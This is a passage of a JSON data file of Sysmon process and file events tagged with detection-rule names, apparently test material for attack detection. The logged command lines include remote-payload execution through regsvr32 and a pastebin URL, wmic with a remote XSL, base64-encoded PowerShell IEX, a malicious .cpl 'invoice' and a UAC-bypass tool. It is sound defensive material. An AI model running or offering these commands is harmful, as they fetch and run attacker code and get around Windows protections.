(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-ABD5-5D3A-0000-0020EB990F00","LogonId":"0xf99eb","ParentCommandLine":"\"C:\\Windows\\hh.exe\" C:\\Users\\IEUser\\Desktop\\Fax Record 
N104F.chm","ParentImage":"C:\\Windows\\hh.exe","ParentProcessGuid":"747F3D96-AE22-5D3A-0000-001096B24E00","ParentProcessId":1504,"ProcessGuid":"747F3D96-AE22-5D3A-0000-001004D84E00","ProcessId":5548,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-26 07:39:14.853"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4353,"Execution":{"#attributes":{"ProcessID":5924,"ThreadID":6056}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-26T07:39:14.935857Z"}},"Version":5}}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\" zipfldr.dll,RouteTheCall c:\\Windows\\System32\\calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-2523-5CD8-0000-00204C360100","LogonId":"0x1364c","ParentCommandLine":"python winpwnage.py -u execute -i 14 -p 
c:\\Windows\\System32\\calc.exe","ParentImage":"C:\\Python27\\python.exe","ParentProcessGuid":"365ABB72-268F-5CD8-0000-0010F4A51700","ParentProcessId":1256,"ProcessGuid":"365ABB72-269E-5CD8-0000-001084F81A00","ProcessId":2728,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 13:58:54.772"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16443,"Execution":{"#attributes":{"ProcessID":2036,"ThreadID":296}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-12T13:58:54.897009Z"}},"Version":5}}}},{"detection":["Indirect Command Execution"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\calc.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Windows Calculator","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=9018A7D6CDBE859A430E8794E73381F77C840BE0,MD5=60B7C0FEAD45F2066E5B805A91F4F0FC,SHA256=80C10EE5F21F92F89CBC293A59D2FD4C01C7958AACAD15642558DB700943FA22,IMPHASH=F93B5D76132F6E6068946EC238813CE1","Image":"C:\\Windows\\System32\\calc.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-4FB5-5CD8-0000-0020F2350100","LogonId":"0x135f2","ParentCommandLine":"\"C:\\Windows\\System32\\pcalua.exe\" -a c:\\Windows\\system32\\calc.exe","ParentImage":"C:\\Windows\\System32\\pcalua.exe","ParentProcessGuid":"365ABB72-517E-5CD8-0000-001024D61700","ParentProcessId":2952,"ProcessGuid":"365ABB72-517E-5CD8-0000-00105FE01700","ProcessId":2920,"Product":"Microsoft® Windows® Operating 
System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 17:01:50.852"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16498,"Execution":{"#attributes":{"ProcessID":2012,"ThreadID":300}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-12T17:01:51.007950Z"}},"Version":5}}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Flags Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Microsoft(C) Register Server","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-63FC-5CD8-0000-0020EE3E0100","LogonId":"0x13eee","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-6693-5CD8-0000-0010AE4C0E00","ParentProcessId":3528,"ProcessGuid":"365ABB72-6759-5CD8-0000-0010E2D50F00","ProcessId":1420,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 
18:35:05.140"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16792,"Execution":{"#attributes":{"ProcessID":1880,"ThreadID":2020}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-12T18:35:05.155949Z"}},"Version":5}}}},{"detection":["Regsvr32 Command Line Without DLL"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-63FC-5CD8-0000-0020EE3E0100","LogonId":"0x13eee","ParentCommandLine":"regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll","ParentImage":"C:\\Windows\\System32\\regsvr32.exe","ParentProcessGuid":"365ABB72-6759-5CD8-0000-0010E2D50F00","ParentProcessId":1420,"ProcessGuid":"365ABB72-6759-5CD8-0000-001085031000","ProcessId":1912,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 
18:35:05.765"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16793,"Execution":{"#attributes":{"ProcessID":1880,"ThreadID":2020}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-12T18:35:05.780949Z"}},"Version":5}}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\rundll32.exe\" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-F419-5D53-0000-002026910200","LogonId":"0x29126","ParentCommandLine":"C:\\Windows\\Explorer.EXE","ParentImage":"C:\\Windows\\explorer.exe","ParentProcessGuid":"747F3D96-F41E-5D53-0000-001067C80300","ParentProcessId":4824,"ProcessGuid":"747F3D96-FBCA-5D53-0000-0010B8664100","ProcessId":2476,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-14 
12:17:14.447"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":10674,"Execution":{"#attributes":{"ProcessID":2004,"ThreadID":4480}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-14T12:17:14.614739Z"}},"Version":5}}}},{"detection":["FromBase64String Command Line","Encoded FromBase64String","Suspicious Script Execution From Temp Folder","Encoded IEX"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"c:\\windows\\system32\\wscript.exe\" /E:vbs c:\\windows\\temp\\icon.ico \"powershell -exec bypass -c \"\"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')))\"\"\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft ® Windows Based Script Host","FileVersion":"5.812.10240.16384","Hashes":"SHA1=267D05CE8D10D97620BE1C7773757668BAEB19EE,MD5=F5E5DF6C9D62F4E940B334954A2046FC,SHA256=47CACD60D91441137D055184614B1A418C0457992977857A76CA05C75BBC1B56,IMPHASH=0F71D5F6F4CBB935CE1B09754102419C","Image":"C:\\Windows\\System32\\wscript.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-F419-5D53-0000-002026910200","LogonId":"0x29126","ParentCommandLine":"\"C:\\Windows\\system32\\rundll32.exe\" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}","ParentImage":"C:\\Windows\\System32\\rundll32.exe","ParentProcessGuid":"747F3D96-FBCA-5D53-0000-0010B8664100","ParentProcessId":2476,"ProcessGuid":"747F3D96-FBCA-5D53-0000-001036784100","ProcessId":2876,"Product":"Microsoft ® Windows Script 
Host","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-14 12:17:14.661"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":10675,"Execution":{"#attributes":{"ProcessID":2004,"ThreadID":4480}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-14T12:17:14.893930Z"}},"Version":5}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-07-29 21:09:48.910","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-6056-5D3F-0000-0010C9EF4100","ProcessId":4600,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Downloads\\Invoice@0582.cpl","UtcTime":"2019-07-29 21:11:11.127"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":4860,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:11:11.156704Z"}},"Version":2}}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\rundll32.exe\" Shell32.dll,Control_RunDLL 
\"C:\\Users\\IEUser\\Downloads\\Invoice@0582.cpl\",","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-6053-5D3F-0000-0020B5314100","LogonId":"0x4131b5","ParentCommandLine":"\"C:\\Windows\\System32\\control.exe\" \"C:\\Users\\IEUser\\Downloads\\Invoice@0582.cpl\",","ParentImage":"C:\\Windows\\System32\\control.exe","ParentProcessGuid":"747F3D96-60F5-5D3F-0000-0010A7B65500","ParentProcessId":4996,"ProcessGuid":"747F3D96-60F5-5D3F-0000-0010D1CF5500","ProcessId":4356,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:11:17.445"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4863,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:11:17.587732Z"}},"Version":5}}}},{"detection":["Suspicious Call by Ordinal"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\SysWOW64\\rundll32.exe\" \"C:\\Windows\\SysWOW64\\shell32.dll\",#44 \"C:\\Users\\IEUser\\Downloads\\Invoice@0582.cpl\",","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\","Description":"Windows host process 
(Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-6053-5D3F-0000-0020B5314100","LogonId":"0x4131b5","ParentCommandLine":"\"C:\\Windows\\system32\\rundll32.exe\" Shell32.dll,Control_RunDLL \"C:\\Users\\IEUser\\Downloads\\Invoice@0582.cpl\",","ParentImage":"C:\\Windows\\System32\\rundll32.exe","ParentProcessGuid":"747F3D96-60F5-5D3F-0000-0010D1CF5500","ParentProcessId":4356,"ProcessGuid":"747F3D96-60F5-5D3F-0000-0010A8D75500","ProcessId":4884,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:11:17.503"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4864,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:11:17.621241Z"}},"Version":5}}}},{"detection":["Suspicious Script Execution From Temp Folder"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\wscript.exe\" /e:JScript.Encode /nologo C:\\Users\\IEUser\\AppData\\Local\\Temp\\info.txt","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\","Description":"Microsoft ® Windows Based Script 
Host","FileVersion":"5.812.10240.16384","Hashes":"SHA1=5D7F2AFD2FF69D379B69DD94033B51EC537E8E52,MD5=F2748908C6B873CB1970DF4C07223E72,SHA256=0FBB4F848D9FB14D7BF81B0454203810869C527C3435E8747A2213DD86F8129A,IMPHASH=3602F3C025378F418F804C5D183603FE","Image":"C:\\Windows\\SysWOW64\\wscript.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-6053-5D3F-0000-0020B5314100","LogonId":"0x4131b5","ParentCommandLine":"\"C:\\Windows\\SysWOW64\\rundll32.exe\" \"C:\\Windows\\SysWOW64\\shell32.dll\",#44 \"C:\\Users\\IEUser\\Downloads\\Invoice@0582.cpl\",","ParentImage":"C:\\Windows\\SysWOW64\\rundll32.exe","ParentProcessGuid":"747F3D96-60F5-5D3F-0000-0010A8D75500","ParentProcessId":4884,"ProcessGuid":"747F3D96-60F7-5D3F-0000-00106F2F5600","ProcessId":6160,"Product":"Microsoft ® Windows Script Host","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:11:19.010"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4865,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:11:19.098105Z"}},"Version":5}}}},{"detection":["XSL Script Processing","SquiblyTwo"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"wmic process list /format:\"https://a.uguu.se/x50IGVBRfr55_test.xsl\"","Company":"Microsoft Corporation","CurrentDirectory":"c:\\","Description":"WMI Commandline Utility","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-CE6C-5CE6-0000-002047F30000","LogonId":"0xf347","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-CE84-5CE6-0000-001094130600","ParentProcessId":2940,"ProcessGuid":"365ABB72-CF01-5CE6-0000-00105DA50C00","ProcessId":3872,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-23 16:49:05.686"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":892,"Execution":{"#attributes":{"ProcessID":2032,"ThreadID":2092}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-23T16:49:05.736570Z"}},"Version":5}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-05-23 16:49:07.731","Image":"C:\\Windows\\System32\\Wbem\\WMIC.exe","ProcessGuid":"365ABB72-CF01-5CE6-0000-00105DA50C00","ProcessId":3872,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S97WTYG7\\x50IGVBRfr55_test[1].xsl","UtcTime":"2019-05-23 
16:49:07.731"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":894,"Execution":{"#attributes":{"ProcessID":2032,"ThreadID":2092}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-23T16:49:07.731893Z"}},"Version":2}}}},{"detection":["WScript or CScript Dropper","Suspicious Script Execution From Temp Folder"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\IEUser\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S97WTYG7\\updatevbs.vbs\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Microsoft ® Windows Based Script Host","FileVersion":"5.8.7600.16385","Hashes":"SHA1=C2752A6515D97D5906232828004BC54C587E6780,MD5=BA7AC4381D685354FF87E0553E950A4E,SHA256=BED1028BADEE2ADE8A8A8EDD25AA4C3E70A6BEEFAFBDFFD6426E5E467F24EB01,IMPHASH=317C8DE06F7AEE57A3ACF4722FE00983","Image":"C:\\Windows\\System32\\wscript.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-98E4-5D04-0000-0020A4350100","LogonId":"0x135a4","ParentCommandLine":"\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" C:\\Users\\IEUser\\Downloads\\updatevbs.html","ParentImage":"C:\\Program Files\\Internet Explorer\\iexplore.exe","ParentProcessGuid":"365ABB72-9C8E-5D04-0000-0010D0421600","ParentProcessId":540,"ProcessGuid":"365ABB72-9C9D-5D04-0000-001039CE1600","ProcessId":172,"Product":"Microsoft ® Windows Script Host","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-06-15 
07:22:05.660"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":7681,"Execution":{"#attributes":{"ProcessID":2044,"ThreadID":2092}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-06-15T07:22:05.691759Z"}},"Version":5}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:21:13.236","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\~DF0187A90594A6AC9B.TMP","UtcTime":"2021-01-26 13:21:13.236"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429127,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:13.237481Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token 
Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:21:13.558","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\NuGetScratch\\lock\\b8162606fcd2bea192a83c85aaff3292f908cfde","UtcTime":"2021-01-26 13:21:13.558"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429128,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:13.558988Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:21:13.560","Image":"C:\\Program Files (x86)\\Microsoft Visual 